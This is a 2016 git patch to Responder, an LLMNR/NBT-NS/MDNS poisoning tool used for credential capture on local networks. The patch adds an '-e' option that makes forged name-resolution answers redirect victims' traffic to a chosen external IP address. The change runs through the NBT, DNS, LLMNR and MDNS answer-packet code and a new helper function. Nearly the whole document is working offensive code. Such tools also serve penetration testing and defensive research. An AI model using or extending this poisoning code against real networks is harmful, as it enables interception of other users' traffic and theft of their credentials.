From 04c270f6b75cd8eb833cca3b71965450d925e6ac Mon Sep 17 00:00:00 2001 From: lgandx Date: Sun, 11 Sep 2016 20:25:10 -0300 Subject: [PATCH] Added option -e, specify an external IP address to redirect poisoned traffic to. --- Responder.py | 7 +++++-- packets.py | 8 ++++---- poisoners/MDNS.py | 3 +-- settings.py | 7 +++++-- utils.py | 6 ++++++ 5 files changed, 21 insertions(+), 10 deletions(-) diff --git a/Responder.py b/Responder.py index 8da125e..996fc28 100755 --- a/Responder.py +++ b/Responder.py @@ -25,8 +25,11 @@ banner() parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0]) parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False) -parser.add_option('-I','--interface', action="store", help="Network interface to use", dest="Interface", metavar="eth0", default=None) -parser.add_option('-i','--ip', action="store", help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None) +parser.add_option('-I','--interface', action="store", help="Network interface to use, you can use 'ALL' as a wildcard for all interfaces", dest="Interface", metavar="eth0", default=None) +parser.add_option('-i','--ip', action="store", help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None) + +parser.add_option('-e', "--externalip", action="store", help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP", metavar="10.0.0.22", default=None) + parser.add_option('-b', '--basic', action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False) parser.add_option('-r', '--wredir', action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False) parser.add_option('-d', '--NBTNSdomain', action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False) diff --git a/packets.py b/packets.py index 182ec1d..fc63444 100644 --- a/packets.py +++ b/packets.py @@ -19,7 +19,7 @@ import settings from base64 import b64decode, b64encode from odict import OrderedDict -from utils import HTTPCurrentDate +from utils import HTTPCurrentDate, RespondWithIPAton # Packet class handling all packet generation (see odict.py). class Packet(): @@ -57,7 +57,7 @@ class NBT_Ans(Packet): def calculate(self,data): self.fields["Tid"] = data[0:2] self.fields["NbtName"] = data[12:46] - self.fields["IP"] = settings.Config.IP_aton + self.fields["IP"] = RespondWithIPAton() # DNS Answer Packet class DNS_Ans(Packet): @@ -83,7 +83,7 @@ class DNS_Ans(Packet): def calculate(self,data): self.fields["Tid"] = data[0:2] self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1]) - self.fields["IP"] = settings.Config.IP_aton + self.fields["IP"] = RespondWithIPAton() self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"])) # LLMNR Answer Packet @@ -111,7 +111,7 @@ class LLMNR_Ans(Packet): ]) def calculate(self): - self.fields["IP"] = settings.Config.IP_aton + self.fields["IP"] = RespondWithIPAton() self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"])) self.fields["AnswerNameLen"] = struct.pack(">h",len(self.fields["AnswerName"]))[1] self.fields["QuestionNameLen"] = struct.pack(">h",len(self.fields["QuestionName"]))[1] diff --git a/poisoners/MDNS.py b/poisoners/MDNS.py index 298b527..757ee5b 100644 --- a/poisoners/MDNS.py +++ b/poisoners/MDNS.py @@ -36,7 +36,6 @@ def Poisoned_MDNS_Name(data): data = data[12:] return data[:len(data)-5] - class MDNS(BaseRequestHandler): def handle(self): MADDR = "224.0.0.251" @@ -56,7 +55,7 @@ class MDNS(BaseRequestHandler): if Parse_IPV6_Addr(data): Poisoned_Name = Poisoned_MDNS_Name(data) - Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=socket.inet_aton(settings.Config.Bind_To)) + Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=RespondWithIPAton()) Buffer.calculate() soc.sendto(str(Buffer), (MADDR, MPORT)) diff --git a/settings.py b/settings.py index aba4957..f1fbde7 100644 --- a/settings.py +++ b/settings.py @@ -152,6 +152,7 @@ class Settings: self.AutoIgnoreList = [] # CLI options + self.ExternalIP = options.ExternalIP self.LM_On_Off = options.LM_On_Off self.WPAD_On_Off = options.WPAD_On_Off self.Wredirect = options.Wredirect @@ -167,11 +168,13 @@ class Settings: self.ProxyAuth_On_Off = options.ProxyAuth_On_Off self.CommandLine = str(sys.argv) + if self.ExternalIP: + self.ExternalIPAton = socket.inet_aton(self.ExternalIP) + if self.HtmlToInject is None: self.HtmlToInject = '' - self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP) - + self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP) self.IP_aton = socket.inet_aton(self.Bind_To) self.Os_version = sys.platform diff --git a/utils.py b/utils.py index f2a1422..d407172 100644 --- a/utils.py +++ b/utils.py @@ -82,6 +82,12 @@ def RespondToThisName(Name): def RespondToThisHost(ClientIp, Name): return RespondToThisIP(ClientIp) and RespondToThisName(Name) +def RespondWithIPAton(): + if settings.Config.ExternalIP: + return settings.Config.ExternalIPAton + else: + return settings.Config.IP_aton + def OsInterfaceIsSupported(): if settings.Config.Interface != "Not set": return not IsOsX()